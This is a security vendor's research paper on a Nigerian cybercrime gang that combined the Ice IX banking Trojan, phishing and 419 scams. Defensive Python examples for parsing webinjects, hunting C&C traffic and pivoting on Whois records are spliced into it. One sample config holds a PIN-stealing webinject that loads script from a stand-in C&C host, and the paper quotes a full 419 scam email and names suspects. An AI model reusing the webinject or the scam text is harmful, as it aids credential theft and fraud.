A Trend Micro Research Paper

“Ice 419”: Cybercriminals from Nigeria Use Ice IX and the 419 Scam

Loucif Kharouni (Forward-Looking Threat Research Team)



Trend Micro | “Ice 419”

2

TREND MICRO LEGAL DISCLAIMER

The information provided herein is for general information and educational purposes only. It is not intended and should not be construed to constitute legal advice. The information contained herein may not be applicable to all situations and may not reflect the most current situation. Nothing contained herein should be relied on or acted upon without the benefit of legal advice based on the particular facts and circumstances presented and nothing herein should be construed otherwise. Trend Micro reserves the right to modify the contents of this document at any time without prior notice.

Translations of any material into other languages are intended solely as a convenience. Translation accuracy is not guaranteed nor implied. If any questions arise related to the accuracy of a translation, please refer to the original language official version of the document. Any discrepancies or differences created in the translation are not binding and have no legal effect for compliance or enforcement purposes.

Although Trend Micro uses reasonable efforts to include accurate and up-to-date information herein, Trend Micro makes no warranties or representations of any kind as to its accuracy, currency, or completeness. You agree that access to and use of and reliance on this document and the content thereof is at your own risk. Trend Micro disclaims all warranties of any kind, express or implied. Neither Trend Micro nor any party involved in creating, producing, or delivering this document shall be liable for any consequence, loss, or damage, including direct, indirect, special, consequential, loss of business profits, or special damages, whatsoever arising out of access to, use of, or inability to use, or in connection with the use of this document, or any errors or omissions in the content thereof. Use of this information constitutes acceptance for use in an “as is” condition.

Contents

Introduction

Ice IX as an Attack Vector

C&C Servers

Connection to Nigeria

Other Forms of Cybercrime

    Phishing

    Nigerian Scams

Suspects

    Smith Samson

    Peter Hollame

    Peter Nzenwata

Organization Map

Domain Ownership

    Domains Registered with the Email Address, {BLOCKED}uglash @ gmail . com

    Domains Registered Under the Name, “Erica Rubalcaba”

    Domains Registered with the Email Address, {BLOCKED}h11 @ hotmail . com

    Domains Registered with the Email Address, {BLOCKED}th2 @ yahoo . com

    Domain Registered with the Email Address, {BLOCKED}th11 @ yahoo . com

Attribution

Conclusion


Introduction

Consistent with our prediction for Africa in 2013 and our research paper on developments in the continent’s Internet infrastructure, this paper addresses cybercrime in the region, specifically a cybercrime gang that uses the banking Trojan Ice IX [1]. We were able to learn how one of these cybercrime operations works. There did not appear to be a single targeted country; the victims were located in India, the United States, and Germany, among others.

Our research helped us determine that the cybercriminal gang is located in Nigeria, principally in Lagos, its most populous city. We were also able to identify certain key members of the operation.

In this research paper, we also describe our findings on the toolkit the group uses, domain ownership, and other related scams.

Ice IX as an Attack Vector

Ice IX is one of the most notorious and dangerous crimeware kits in use today. Known as the first generation of modified ZeuS variants, Ice IX is a reiteration of the banking Trojan built after the ZeuS code was leaked in underground forums [2]. Ice IX is used to steal victims’ credentials or personally identifiable information (PII), including user names and passwords for email, Facebook, and/or online bank accounts. Like ZeuS and SpyEye, Ice IX uses a webinject file. This file contains lines of JavaScript and HTML code that mimic the bank’s page or create fake pop-up messages asking for the users’ credentials while they access their online banking sites. The cybercriminals behind this operation used Ice IX to collect the following information for later use:

• Email addresses: Cybercriminals use victims’ email addresses to send out legitimate-looking spam and to have more convincing reply-to addresses.

• Bank account and credit card numbers: Cybercriminals can abuse these to pay off their own bills. They can also be sold underground.

• Webmail account credentials: Cybercriminals can use victims’ webmail accounts to send out spam with malicious attachments to further spread Ice IX or ZeuS variants.
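The webinject file mentioned above follows the ZeuS-family layout (set_url entries with data_before / data_inject / data_after blocks, each closed by data_end), which Ice IX inherited from the leaked ZeuS code. The parser below is an added example, not code from the paper or from Trend Micro; the configuration text, hostnames and the treatment of ";" lines as comments are constructed assumptions. It recovers the list of targeted sites from a configuration pulled off a C&C server and tells which entries would fire for a given request.

```python
"""Parser for a ZeuS-family webinject configuration (the format Ice IX inherited).
Added example, not code from the paper; the config text below is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass
from fnmatch import fnmatchcase


@dataclass
class WebInject:
    url_mask: str          # wildcard mask matched against the URL the victim visits
    flags: str             # e.g. "GP": inject on GET and on POST responses
    data_before: str = ""  # HTML the bot searches for in the page
    data_inject: str = ""  # HTML/JavaScript spliced in right after data_before
    data_after: str = ""   # optional end marker for the replaced region


# Constructed config in the webinjects.txt layout: a set_url line opens an
# entry; each data_before / data_inject / data_after block ends with data_end.
SAMPLE_WEBINJECTS = """\
set_url https://online.bank-example.test/login* GP
data_before
<input type="password"*>
data_end
data_inject
<div>Please confirm your card PIN: <input name="pin"></div>
data_end
data_after
data_end

set_url http*://mail.example.test/* G
data_before
</head>
data_end
data_inject
<script src="http://cc.example.test/adm/inject.js"></script>
data_end
data_after
data_end
"""

_BLOCKS = ("data_before", "data_inject", "data_after")


def parse_webinjects(text: str) -> list[WebInject]:
    """Parse the config; raises ValueError on a block never closed by data_end
    (a truncated config recovered from a C&C server is a common case)."""
    injects: list[WebInject] = []
    current: WebInject | None = None
    block: str | None = None
    buf: list[str] = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if block is not None:                  # inside a data_* block
            if line == "data_end":
                setattr(current, block, "\n".join(buf))
                block, buf = None, []
            else:
                buf.append(raw)
            continue
        if not line or line.startswith(";"):   # blank line or comment (assumed)
            continue
        if line.startswith("set_url"):
            parts = line.split()
            if len(parts) < 2:
                raise ValueError(f"line {lineno}: set_url without a URL mask")
            current = WebInject(parts[1], parts[2] if len(parts) > 2 else "")
            injects.append(current)
        elif line in _BLOCKS:
            if current is None:
                raise ValueError(f"line {lineno}: {line} before any set_url")
            block = line
        else:
            raise ValueError(f"line {lineno}: unexpected token {line!r}")
    if block is not None:
        raise ValueError(f"unterminated {block} block (missing data_end)")
    return injects


def targeted_sites(injects: list[WebInject]) -> list[str]:
    """Deduplicated hostnames named in the URL masks, e.g. for victim notification."""
    hosts = set()
    for inj in injects:
        m = re.match(r"https?\*?://([^/*]+)", inj.url_mask)
        if m:
            hosts.add(m.group(1))
    return sorted(hosts)


def injects_for(injects: list[WebInject], url: str, method: str = "GET") -> list[WebInject]:
    """Entries that would fire for one request: mask matches and method flag set."""
    flag = "G" if method.upper() == "GET" else "P"
    return [i for i in injects if fnmatchcase(url, i.url_mask) and flag in i.flags]
```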

[1] Trend Micro Incorporated. (2013). “Security Threats to Business, the Digital Lifestyle, and the Cloud: Trend Micro Predictions for 2013 and Beyond.” Last accessed October 31, 2013, http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/spotlight-articles/sp-trend-micro-predictions-for-2013-and-beyond.pdf; Loucif Kharouni. (2013). “Africa: A New Safe Harbor for Cybercriminals?” Last accessed October 31, 2013, http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-africa.pdf.

[2] Jasper Manuel. (September 2, 2011). TrendLabs Security Intelligence Blog. “ZeuS Gets Another Update.” Last accessed October 31, 2013, http://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/.


C&C Servers

We located some of the cybercriminals’ command-and-control (C&C) servers using various techniques. We gathered all domains registered using the same email address, which has been known to belong to one of the cybercriminals. Another technique used was to look for more C&C servers after gaining access to the gang’s C&C control panel. We were also able to gather data on servers they either hijacked or owned based on the folder pattern, Whois records, and open source research. The following table shows some of the C&C servers we found.

C&C Servers

Hijacked:

• http :// {BLOCKED}ver . be / web / adm / index . php

• http :// {BLOCKED}malo . com / includes / colabo / web / adm / gate . php

• http :// {BLOCKED}king . com / web / adm / gate . php

Owned:

• http :// {BLOCKED} . co . za / web1 / web / adm / index . php

• http :// {BLOCKED} . co . za / web / adm / index . php

Here are screenshots of the C&C communications that show the number of infected machines. Note that each C&C server only had a few bots.

Figure 1: Infection count per C&C server
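The "folder pattern" the paper used to find more servers (paths ending in /adm/gate.php, /adm/index.php or /serv/cp.php) is also usable defensively: the script below, an added example that is not part of the paper, scans constructed proxy log lines for that pattern and counts distinct bots per suspected C&C host, the same per-server view as Figure 1. The log format, hostnames and IP addresses are constructed; gate.php being the bot check-in endpoint and index.php/cp.php the operator panel is the ZeuS panel layout and is stated here as an assumption.

```python
"""Hunt for the Ice IX/ZeuS control-panel folder pattern in web proxy logs.
Added example, not from the paper; log lines are constructed.  Assumed layout:
<dir>/adm/gate.php receives bot check-ins (POST); <dir>/adm/index.php,
<dir>/adm/cp.php and <dir>/serv/cp.php are the operator's control panel."""
import re
from collections import defaultdict

GATE_RE = re.compile(r"/adm/gate\.php$", re.I)
PANEL_RE = re.compile(r"/(?:adm/(?:index|cp)\.php|serv/cp\.php)$", re.I)

# Constructed proxy log format: "<timestamp> <client_ip> <method> <url> <status> <bytes>"
LOG_RE = re.compile(
    r"^(\S+)\s+(\S+)\s+(GET|POST)\s+(https?://([^/\s]+)(/\S*)?)\s+(\d{3})\s+(\d+)$"
)

SAMPLE_LOG = """\
2013-10-31T09:00:01Z 10.1.1.20 POST http://hijacked.example.test/includes/colabo/web/adm/gate.php 200 512
2013-10-31T09:00:04Z 10.1.1.21 POST http://hijacked.example.test/includes/colabo/web/adm/gate.php 200 498
2013-10-31T09:00:05Z 10.1.1.20 POST http://hijacked.example.test/includes/colabo/web/adm/gate.php 200 530
2013-10-31T09:01:12Z 10.1.1.22 POST http://owned.example.test/web1/web/adm/gate.php 200 600
2013-10-31T09:02:00Z 10.1.1.23 GET http://owned.example.test/web1/web/adm/index.php 200 3400
2013-10-31T09:02:30Z 10.1.1.24 GET http://shop.example.test/catalog/index.php 200 9000
2013-10-31T09:03:00Z 10.1.1.25 POST http://shop.example.test/contact/gate.php 200 100
this line is malformed and is skipped
"""


def parse_line(line):
    """Return a dict for a well-formed line, or None so a bad line cannot abort a hunt."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, src, method, _url, host, path, status, nbytes = m.groups()
    return {"ts": ts, "src": src, "method": method, "host": host.lower(),
            "path": path or "/", "status": int(status), "bytes": int(nbytes)}


def hunt(log_text):
    """Per destination host: distinct bot IPs posting to gate.php, the number of
    check-ins, and the client IPs that opened the panel.  A plain index.php or a
    gate.php outside an adm/ folder (common on legitimate sites) is not flagged."""
    findings = defaultdict(lambda: {"bots": set(), "checkins": 0, "panel_clients": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and GATE_RE.search(rec["path"]):
            f = findings[rec["host"]]
            f["bots"].add(rec["src"])
            f["checkins"] += 1
        elif PANEL_RE.search(rec["path"]):
            findings[rec["host"]]["panel_clients"].add(rec["src"])
    return dict(findings)


def report(findings):
    """One line per suspected C&C host, mirroring the per-server bot counts in Figure 1."""
    out = []
    for host in sorted(findings):
        f = findings[host]
        viewers = ", ".join(sorted(f["panel_clients"])) or "nobody"
        out.append(f"{host}: {len(f['bots'])} bot(s), {f['checkins']} check-in(s), "
                   f"panel opened by {viewers}")
    return out


if __name__ == "__main__":
    print("\n".join(report(hunt(SAMPLE_LOG))))
```

A host that appears with both bot check-ins and a panel viewer is the strongest signal; the panel viewer's source address is what the paper's attribution work pivots on.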


Connection to Nigeria

The infected machines in Nigeria were used to connect to Ice IX C&C servers. Based on the data gathered from the C&C logs, we discovered that the cybercriminals used the infected machines as SOCKS proxies to connect to different sites as well as other Ice IX control panels.

Figure 2: Evidence that the cybercriminals used an infected machine as a proxy to connect to a C&C server

Figure 3: More machines in Nigeria used as proxies


It is still unclear why some of the cybercriminals used infected machines located in Nigeria, their own country, to carry out malicious activities. We are absolutely certain that they operated from Nigeria, based on evidence such as chat logs of communications between the different parties and 4G connection subscription records, which gave the IP address of the device they used. A possible explanation is that the cybercriminals believe routing through an infected machine is enough to cover their tracks, even when that machine is in the same country.

Figure 4: 4G connection session

Other Forms of Cybercrime

Apart from using the Ice IX banking Trojan, some members of the gang appeared to be involved with various phishing and Nigerian or 419 scams. Phishing pages helped them gather various victims’ PII.

Phishing

The cybercriminals appeared to use at least three different phishing page types. One type impersonated Scottrade . com, the site of a privately owned American discount retail brokerage firm that offers both online and branch office services.


Figure 5: Fake Scottrade site

Another phishing sample impersonated the popular Korean search engine site, Daum . net. A famous online dating site, Match . com, was also phished.

Figure 6: Fake Daum . net log-in page


Figure 7: Fake Match . com log-in page

Nigerian Scams

The cybercriminals also engaged in Nigerian or 419 scams, so named after section 419 of the Nigerian penal code, which outlaws this particular type of fraud [3]. This type of scam requires the victim to make an upfront payment in exchange for a promised reward for helping “officials” of Nigerian government ministries or the “family members” of political leaders.

Take a look at the following template of the email sent to several people, which caused them to reply with personal information such as their bank account details and copies of their IDs.

[3] United States Diplomatic Mission to Nigeria. “Nigerian Advance Fee Fraud (419) Resources.” Last accessed October 31, 2013, http://nigeria.usembassy.gov/scam419.html.


Sir/Madam,

I hope this proposal meets you in a good state of health.

I need your help to transfer and invest S$15,000,000.00 that accumulated as undeclared profit made by this branch HFC Bank Ghana Limited under my management.

All that is required to get the funds transferred out of here is to put your name on the Non-investment account holding the funds. This practically makes you a Non-Resident customer of HFC Bank.

I will then guide you on how to apply for Closure of the Account and credit transfer of the funds to your designated bank account. You will get 40% of the funds for your role.

If you get back to me with your physical, contact address, your photo ID and direct telephone number, we will consummate the funds transfer within one week.

[email protected]

Sincerely, Ampah Edward

This email template is sent out using a spamming tool known as a “PHP mailer.” The cybercriminals hold several lists of email addresses for various countries. We have seen at least two of these lists with around 553,000 email addresses from Canada and 490,000 from the United States.

Figure 8: PHP mailer screenshot


Some of the email addresses used in spamming include but are not limited to:

• {BLOCKED}ah @ aim . com

• {BLOCKED}arker001 @ aol . com

• {BLOCKED}arker001 @ live . com

• {BLOCKED}arker002 @ live . com

The cybercriminals also include an accompanying ID to make the email look more legitimate to potential victims.

Figure 9: ID of supposed bank manager

Once the cybercriminals lure a victim in, they redirect him or her to an “agent” from the supposed bank who handles the money transfer. The cybercriminals even created a domain (hfconline - gh . com) that closely mimicked that of the Ghanaian HFC Bank (hfcbank . com . gh). The fake domain is, however, only used for emailing purposes or for asking victims to fill out a form and send scanned copies of their IDs.

We noticed that the cybercriminals have been employing the same scam using different topics. One topic dealt with claiming a cash deposit belonging to a late family member. Another topic used the Gaddafi fortune as hook, specifically the line, “I am in control of US$15,000,000.00 deposited in my bank by the Libya, Gaddafi Family.” The cybercriminals also took advantage of users via a supposed “money transfer proposal from the Ghana Bank.”


What is the connection between using a banking Trojan like Ice IX and 419 scams? The activities described earlier such as operating and spreading Ice IX Trojans and installing PHP mailer are not operated by just one person but by a group of individuals who work together. The attribution section will describe each individual’s task and his or her involvement with the cybercriminal gang.

Suspects

The cybercriminals involved comprise a very large group mainly located in Lagos. Based on the information gathered, three key people have been identified.

Smith Samson

One of the cybercriminals who goes by the name, “Smith Samson,” possibly really Ofeoritse Abalagbeyi (Ofe), uses the following email addresses:

• {BLOCKED}th11 @ yahoo . com

• {BLOCKED}th2 @ yahoo . com (linked to the Facebook account, https :// www . facebook . com / {BLOCKED}se . {BLOCKED}beyi)

• {BLOCKED}th11 @ hotmail . com (linked to the Facebook account, https :// www . facebook . com / {BLOCKED}th . {BLOCKED} . 75)

Figure 10: Facebook profile picture of Ofeoritse Abalagbeyi, also known as “Smith Samson”


Ofe takes care of hosting, creating domains for, and configuring Ice IX and ZeuS C&C servers for the gang. He sends information to someone called “Peter Hollame,” one of his Facebook contacts who uses the email address, {BLOCKED}2 _ u2 @ yahoo . com.

Peter Hollame

Searching for the email address, {BLOCKED}2 _ u2 @ yahoo . com, led to a certain profile on a Nigerian forum called “nairaland . com.” This gave some information about the user’s location and gender.

Figure 11: User profile found on nairaland . com

Figure 12: Invisible . ir shows that {BLOCKED}2 _ u2 @ yahoo . com signed in from Lagos, Nigeria


We also discovered some information on invisible . ir, a site that displays the Yahoo!® Messenger status of any Yahoo! account holder. The site also shows where the user signs in from, which confirmed where the cybercriminal identified as “Peter Hollame” resides.

Figure 13: {BLOCKED}2 _ u2 user pictures

The user pictures above from invisible . ir show the avatars Hollame used over time. One of them is similar to the picture on his Facebook profile.


Figure 14: Peter Hollame from the Facebook account, https :// www . facebook . com / peter . hollame

Hollame, just like Ofe, also uploads ZeuS and Ice IX malware to the gang’s C&C servers (both hijacked and owned) and installs the control panel using the ZeuS 2.0.8.9 toolkit provided by Ofe. In return, Hollame provides Ofe some mailer tools and credit card numbers.

Hollame acts as a middleman and communicates and works with another individual, Uzochukwu Nzenwata, also known as “Peter Nzenwata.”

Peter Nzenwata

Based on our investigation, Hollame appears to also provide mailer tools to a certain “Peter Nzenwata” so he can send out Nigerian scam emails. Hollame also sends credit card information to Nzenwata to pay for the latter’s phone and 4G connection bills. We also learned that Nzenwata moved to Ghana in 2008 but is currently back in Nigeria and is using 4G 1Mbps wireless access. It appears that Nzenwata heavily relies on his peers, as he has no control over the C&C servers, the mailer tools, and the email list for spamming purposes.

Below are the email addresses Nzenwata appears to use:

• {BLOCKED}er2005 @ yahoo . com

• {BLOCKED}eter @ yahoo . com (linked to the Facebook account, https :// www . facebook . com / {BLOCKED}kwuInnocent)


Figure 15: Uzochukwu Nzenwata, also known as “Peter Nzenwata”

Figure 16: Main people involved in the scams


Organization Map


Domain Ownership

The Ice IX domains are all registered under co . za, the South African country-code top-level domain (TLD). Note that most of the domains listed below refer to C&C servers.

Domains Registered with the Email Address, {BLOCKED}uglash @ gmail . com

• {BLOCKED}dand . co . za

• {BLOCKED}ntfighting . co . za

• {BLOCKED}ls . co . za

• {BLOCKED}k . co . za

• {BLOCKED}regh . co . za

Domains Registered Under the Name, “Erica Rubalcaba”

• {BLOCKED}dew . net

• {BLOCKED}odand . co . za

• {BLOCKED}antfighting . co . za

• {BLOCKED}antfighting . net

• {BLOCKED}opls . co . za

• {BLOCKED}lock . co . za

• {BLOCKED}regh . co . za

Domains Registered with the Email Address, {BLOCKED}h11 @ hotmail . com

• {BLOCKED} - sa . com

• {BLOCKED}cng . net

• {BLOCKED}online . org

• {BLOCKED}w1 . co . za


Domains Registered with the Email Address, {BLOCKED}th2 @ yahoo . com

• {BLOCKED}aycbnk . net

• {BLOCKED}ghana . biz

• {BLOCKED}markcop . org

• {BLOCKED}stenderboard . com

• {BLOCKED}ample . com

• {BLOCKED}lsecuritycompany . org

• {BLOCKED}lx . co

• {BLOCKED}ls . info

• {BLOCKED}nesp . net

• {BLOCKED}inesp12 . com

• {BLOCKED}perweels . com

• {BLOCKED}qw . com

• {BLOCKED}d - nation . net

• {BLOCKED}dnation . me

• {BLOCKED}ation . mobi

Domain Registered with the Email Address, {BLOCKED}th11 @ yahoo . com

• {BLOCKED}liacredithouse . net
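The lists above come from registrant pivoting: start from one email address known to belong to a suspect, collect the domains registered with it, then pivot through the other registrant attributes on those records (here the name “Erica Rubalcaba”, whose domains overlap the gmail registrations) to reach more domains. The script below is an added example, not the paper's own tooling; the Whois-style records, names, addresses and domains are constructed. It also handles the failure mode a practitioner hits immediately in real Whois data: pivoting through a privacy-proxy or registrar-default value links every customer of that proxy into one bogus cluster.

```python
"""Registrant pivoting over Whois-style records, the technique behind the
paper's Domain Ownership lists.  Added example with constructed records, not
the paper's code."""
from collections import defaultdict, deque

# Constructed records: (domain, registrant_email, registrant_name).
RECORDS = [
    ("dand.test",     "seed@example.test",  "Erica Rubalcaba"),
    ("fighting.test", "seed@example.test",  "Erica Rubalcaba"),
    ("regh.test",     "seed@example.test",  "Erica Rubalcaba"),
    ("dew.test",      "other@example.test", "Erica Rubalcaba"),
    ("cng.test",      "other@example.test", "J. Doe"),
    ("proxied.test",  "other@example.test", "WhoisGuard Protected"),
    ("shop1.test",    "privacy@proxy.test", "WhoisGuard Protected"),
    ("shop2.test",    "privacy@proxy.test", "WhoisGuard Protected"),
    ("blog.test",     "privacy@proxy.test", "WhoisGuard Protected"),
]

# Constructed values that identify a privacy proxy rather than a person.
PRIVACY_VALUES = {"privacy@proxy.test", "whoisguard protected"}


def pivot(records, seed_email, ignore_values=PRIVACY_VALUES, hub_threshold=50):
    """Return {domain: chain of attributes used to reach it}.  An attribute is
    never pivoted through if it is in ignore_values or is shared by
    hub_threshold or more domains (registrar defaults behave like proxies)."""
    by_attr = defaultdict(set)     # ("email"|"name", value) -> domains
    by_domain = defaultdict(set)   # domain -> attributes
    for domain, email, name in records:
        for attr in (("email", email.lower()), ("name", name.lower())):
            by_attr[attr].add(domain)
            by_domain[domain].add(attr)

    def usable(attr):
        return attr[1] not in ignore_values and len(by_attr[attr]) < hub_threshold

    start = ("email", seed_email.lower())
    reached = {}
    seen = {start}
    queue = deque([(start, ())])
    while queue:                   # breadth-first, so chains are shortest pivots
        attr, path = queue.popleft()
        chain = path + (attr,)
        for domain in sorted(by_attr.get(attr, ())):
            if domain in reached:
                continue
            reached[domain] = chain
            for nxt in sorted(by_domain[domain]):
                if nxt not in seen and usable(nxt):
                    seen.add(nxt)
                    queue.append((nxt, chain))
    return reached


def ownership_listing(records, reached):
    """Group the pivoted domains by registrant email, in the layout of the
    paper's 'Domains Registered with the Email Address ...' lists."""
    listing = defaultdict(list)
    for domain, email, _name in records:
        if domain in reached:
            listing[email.lower()].append(domain)
    return {k: sorted(v) for k, v in listing.items()}


if __name__ == "__main__":
    found = pivot(RECORDS, "seed@example.test")
    for email, domains in ownership_listing(RECORDS, found).items():
        print(f"Domains registered with {email}:")
        for d in domains:
            print(f"  {d}  via {' -> '.join(v for _, v in found[d])}")
```

The recorded chain for each domain is what makes the result defensible: it shows exactly which shared value linked it to the seed, which is the evidence an analyst has to present.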


Attribution

We discovered the following list of URLs related to how the cybercriminals operate and manage their C&C servers.


Below is a list of the malware samples that appear to connect to the related C&C infrastructure.

Malware Samples That Access the C&C Infrastructure

Detection Name   MD5 Hash
TSPY_ZBOT.NEK    d144c261790a8b2bb10f465deb97d7a5
TSPY_ZBOT.NEK    52973c550ebc3977fc816f417d9d8eed
TSPY_ZBOT.NEK    318f100792439359654356389ec5a34a
TSPY_ZBOT.UZS    78e07300b8355f5b046c5159fbce4d88
TSPY_ZBOT.SML9   8957b362028d8ddc378aecaaa97a0475
TSPY_ZBOT.SML9   0ab85fa27224a9be29d3ab4b3f14797a


Conclusion

Dealing with Africa as a new cybercrime harbor is a struggle that threat researchers now face. The three main members named in this research paper are still at large and are continuing their operations. They are part of a larger group, as shown by the organization map, which itself represents only a small portion of the African underground community involved in this type of business. Several smaller 419 groups are also engaged in this lucrative business. These individuals appear unconcerned about covering their tracks because they think it would be hard for authorities to arrest them.

It is interesting to see that these cybercriminals share tasks and specialize in specific areas such as hosting, creating domains, and running the botnet. The other tasks concentrated on looking for email addresses, working on the PHP mailers, and launching spam campaigns. Infiltrating different C&C servers and being able to search through their logs helped us identify some of the cybercriminals. We were also able to find other C&C servers that the bad guys used. These perpetrators appear to act swiftly as soon as their C&C servers get shut down; they are always looking for vulnerable servers on which to install Ice IX Trojans, while creating new domains for the same purpose. They are well organized and know their respective tasks.

We noted that the perpetrators looked for the following:

• Vulnerable domains/servers to hijack and install banking Trojans on

• Vulnerable domains/servers to hijack and install PHP mailers on

• Fresh lists of email addresses to spam

There appears to be no limit to how freely these cybercriminals cooperate with their peers. They willingly share what they have and, in return, receive the information they need, such as a list of email addresses they call “leads” and an available, working PHP mailer.

The number of cybercriminal activities targeting or originating from Africa will continue to rise. For instance, the Nigerian scam is still an attractive business, especially for jobless youth. In addition, Ice IX has been a welcome addition to cybercriminal operations for its reliability and stability.


Trend Micro Incorporated, a global leader in security software, strives to make the world safe for exchanging digital information. Our innovative solutions for consumers, businesses and governments provide layered content security to protect information on mobile devices, endpoints, gateways, servers and the cloud. All of our solutions are powered by cloud-based global threat intelligence, the Trend Micro™ Smart Protection Network™, and are supported by over 1,200 threat experts around the globe. For more information, visit www.trendmicro.com.

©2013 by Trend Micro, Incorporated. All rights reserved. Trend Micro and the Trend Micro t-ball logo are trademarks or registered trademarks of Trend Micro, Incorporated. All other product or company names may be trademarks or registered trademarks of their owners.

10101 N. De Anza Blvd., Cupertino, CA 95014

U.S. toll free: 1 +800.228.5651
Phone: 1 +408.257.1500
Fax: 1 +408.257.2003